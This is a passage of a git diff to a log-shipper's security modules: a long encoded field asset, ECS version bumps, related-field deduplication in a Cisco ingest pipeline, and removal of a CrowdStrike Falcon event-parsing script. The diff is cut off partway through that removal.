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" } diff --git a/x-pack/filebeat/module/cisco/ftd/config/input.yml b/x-pack/filebeat/module/cisco/ftd/config/input.yml index 8a3ec3e9ab45..ebf27d1b115a 100644 --- a/x-pack/filebeat/module/cisco/ftd/config/input.yml +++ b/x-pack/filebeat/module/cisco/ftd/config/input.yml @@ -22,7 +22,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json index 72b115c6975b..cbb36cb61856 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json @@ -98,7 +98,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -146,7 +145,6 @@ "observer.type": "firewall", "observer.vendor": "Cisco", "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -201,7 +199,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", @@ -247,7 +244,6 @@ "SNL-ASA-VPN-A01" ], "related.ip": [ - "10.123.123.123", "10.123.123.123" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/ios/config/input.yml b/x-pack/filebeat/module/cisco/ios/config/input.yml index 9c69edf8d11c..52431a661831 100644 --- a/x-pack/filebeat/module/cisco/ios/config/input.yml +++ b/x-pack/filebeat/module/cisco/ios/config/input.yml @@ -23,7 +23,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 - script: lang: javascript id: cisco_ios diff --git a/x-pack/filebeat/module/cisco/meraki/config/input.yml b/x-pack/filebeat/module/cisco/meraki/config/input.yml index 8f635db379e7..fe55241042b0 100644 --- a/x-pack/filebeat/module/cisco/meraki/config/input.yml +++ b/x-pack/filebeat/module/cisco/meraki/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/cisco/nexus/config/input.yml b/x-pack/filebeat/module/cisco/nexus/config/input.yml index a685316e6399..b17aa083854a 100644 --- a/x-pack/filebeat/module/cisco/nexus/config/input.yml +++ b/x-pack/filebeat/module/cisco/nexus/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml index 581691ebcf91..b76b7a69a20b 100644 --- a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml +++ b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml @@ -1613,14 +1613,27 @@ processors: field: related.ip value: "{{source.ip}}" if: "ctx?.source?.ip != null" + allow_duplicates: false - append: field: related.ip value: "{{destination.ip}}" if: "ctx?.destination?.ip != null" + allow_duplicates: false - append: field: related.user value: "{{user.name}}" - if: "ctx?.user?.name != null" + if: "ctx?.user?.name != null && ctx?.user?.name != ''" + allow_duplicates: false + - append: + field: related.user + value: "{{host.user.name}}" + if: ctx?.host?.user?.name != null && ctx?.host?.user?.name != '' + allow_duplicates: false + - append: + field: related.user + value: "{{source.user.name}}" + if: ctx?.source?.user?.name != null && ctx?.source?.user?.name != '' + allow_duplicates: false - append: field: related.user value: "{{destination.user.name}}" @@ -1630,6 +1643,7 @@ processors: field: related.hash value: "{{file.hash.sha256}}" if: "ctx?.file?.hash?.sha256 != null" + allow_duplicates: false - append: field: related.hosts value: "{{host.hostname}}" diff --git a/x-pack/filebeat/module/cisco/umbrella/config/input.yml b/x-pack/filebeat/module/cisco/umbrella/config/input.yml index d4b26c49ce8a..d2da78cc349a 100644 --- a/x-pack/filebeat/module/cisco/umbrella/config/input.yml +++ b/x-pack/filebeat/module/cisco/umbrella/config/input.yml @@ -22,4 +22,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/coredns/log/config/coredns.yml b/x-pack/filebeat/module/coredns/log/config/coredns.yml index 8c4509eb2270..162208f2e80a 100644 --- a/x-pack/filebeat/module/coredns/log/config/coredns.yml +++ b/x-pack/filebeat/module/coredns/log/config/coredns.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml b/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml index e70201cb1744..de7c32e3d3b6 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml +++ b/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml @@ -16,11 +16,18 @@ tags: {{.tags | tojson}} publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} processors: -- script: - lang: javascript - id: crowdstrike_falcon - file: ${path.home}/module/crowdstrike/falcon/config/pipeline.js +- decode_json_fields: + fields: + - message + target: crowdstrike + process_array: true + max_depth: 8 +- drop_fields: + fields: + - message + - host.name + ignore_missing: true - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/crowdstrike/falcon/config/pipeline.js b/x-pack/filebeat/module/crowdstrike/falcon/config/pipeline.js deleted file mode 100644 index 46bbf671518e..000000000000 --- a/x-pack/filebeat/module/crowdstrike/falcon/config/pipeline.js +++ /dev/null @@ -1,474 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -var crowdstrikeFalconProcessor = (function () { - var processor = require("processor"); - - // conversion helpers - function convertUnderscore(text) { - return text.split(/(?=[A-Z])/).join('_').toLowerCase(); - } - - function convertToMSEpoch(evt, field) { - var timestamp = evt.Get(field); - if (timestamp == 0) { - evt.Delete(field) - return - } - if (timestamp) { - if (timestamp < 100000000000) { // check if we have a seconds timestamp, this is roughly 1973 in MS - evt.Put(field, timestamp * 1000); - } - (new processor.Timestamp({ - field: field, - target_field: field, - timezone: "UTC", - layouts: ["UNIX_MS"] - })).Run(evt); - } - } - - function convertProcess(evt) { - var commandLine = evt.Get("crowdstrike.event.CommandLine") - if (commandLine && commandLine.trim() !== "") { - var args = commandLine.split(' ').filter(function (arg) { - return arg !== ""; - }); - var executable = args[0] - - evt.Put("process.command_line", commandLine) - evt.Put("process.args", args) - evt.Put("process.executable", executable) - } - } - - function convertSourceDestination(evt) { - var localAddress = evt.Get("crowdstrike.event.LocalAddress"); - var localPort = evt.Get("crowdstrike.event.LocalPort"); - var remoteAddress = evt.Get("crowdstrike.event.RemoteAddress"); - var remotePort = evt.Get("crowdstrike.event.RemotePort"); - if (evt.Get("crowdstrike.event.ConnectionDirection") === "1") { - evt.Put("network.direction", "ingress") - evt.Put("source.ip", remoteAddress) - evt.Put("source.port", remotePort) - evt.Put("destination.ip", localAddress) - evt.Put("destination.port", localPort) - } else { - evt.Put("network.direction", "egress") - evt.Put("destination.ip", remoteAddress) - evt.Put("destination.port", remotePort) - evt.Put("source.ip", localAddress) - evt.Put("source.port", localPort) - } - evt.AppendTo("related.ip", remoteAddress) - evt.AppendTo("related.ip", localAddress) - } - - function convertEventAction(evt) { - evt.Put("event.action", convertUnderscore(evt.Get("crowdstrike.metadata.eventType"))) - } - - function convertUsername(evt) { - var username = evt.Get("crowdstrike.event.UserName") - if (!username || username === "") { - username = evt.Get("crowdstrike.event.UserId") - } - if (username && username !== "") { - evt.Put("user.name", username) - if (username.split('@').length == 2) { - evt.Put("user.email", username) - } - evt.AppendTo("related.user", username) - } - } - - // event processors by type - var eventProcessors = { - DetectionSummaryEvent: new processor.Chain() - .AddFields({ - fields: { - "event.kind": "alert", - "event.category": ["malware"], - "event.type": ["info"], - "event.dataset": "crowdstrike.falcon_endpoint", - "agent.type": "falcon", - }, - target: "", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.LocalIP", - to: "source.ip", - type: "ip" - }, { - from: "crowdstrike.event.LocalIP", - to: "related.ip", - type: "ip" - }, { - from: "crowdstrike.event.ProcessId", - to: "process.pid", - type: "long" - }, { - from: "crowdstrike.event.ParentImageFileName", - to: "process.parent.executable" - }, { - from: "crowdstrike.event.ParentCommandLine", - to: "process.parent.command_line" - }, { - from: "crowdstrike.event.PatternDispositionDescription", - to: "event.action", - }, { - from: "crowdstrike.event.FalconHostLink", - to: "event.url", - }, { - from: "crowdstrike.event.Severity", - to: "event.severity", - }, { - from: "crowdstrike.event.DetectDescription", - to: "message", - }, { - from: "crowdstrike.event.FileName", - to: "process.name", - }, { - from: "crowdstrike.event.UserName", - to: "user.name", - }, - { - from: "crowdstrike.event.MachineDomain", - to: "user.domain", - }, - { - from: "crowdstrike.event.SensorId", - to: "agent.id", - }, - { - from: "crowdstrike.event.ComputerName", - to: "host.name", - }, - { - from: "crowdstrike.event.SHA256String", - to: "file.hash.sha256", - }, - { - from: "crowdstrike.event.MD5String", - to: "file.hash.md5", - }, - { - from: "crowdstrike.event.SHA1String", - to: "file.hash.sha1", - }, - { - from: "crowdstrike.event.DetectName", - to: "rule.name", - }, - { - from: "crowdstrike.event.DetectDescription", - to: "rule.description", - } - ], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(function (evt) { - var tactic = evt.Get("crowdstrike.event.Tactic").toLowerCase() - var technique = evt.Get("crowdstrike.event.Technique").toLowerCase() - evt.Put("threat.technique.name", technique) - evt.Put("threat.tactic.name", tactic) - convertProcess(evt) - }) - .Build(), - - IncidentSummaryEvent: new processor.Chain() - .AddFields({ - fields: { - "event.kind": "alert", - "event.category": ["malware"], - "event.type": ["info"], - "event.action": "incident", - "event.dataset": "crowdstrike.falcon_endpoint", - "agent.type": "falcon", - }, - target: "", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.FalconHostLink", - to: "event.url", - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(function (evt) { - evt.Put("message", "Incident score " + evt.Get("crowdstrike.event.FineScore")) - convertProcess(evt) - }) - .Build(), - - UserActivityAuditEvent: new processor.Chain() - .AddFields({ - fields: { - kind: "event", - category: ["iam"], - type: ["change"], - dataset: "crowdstrike.falcon_audit", - }, - target: "event", - }) - 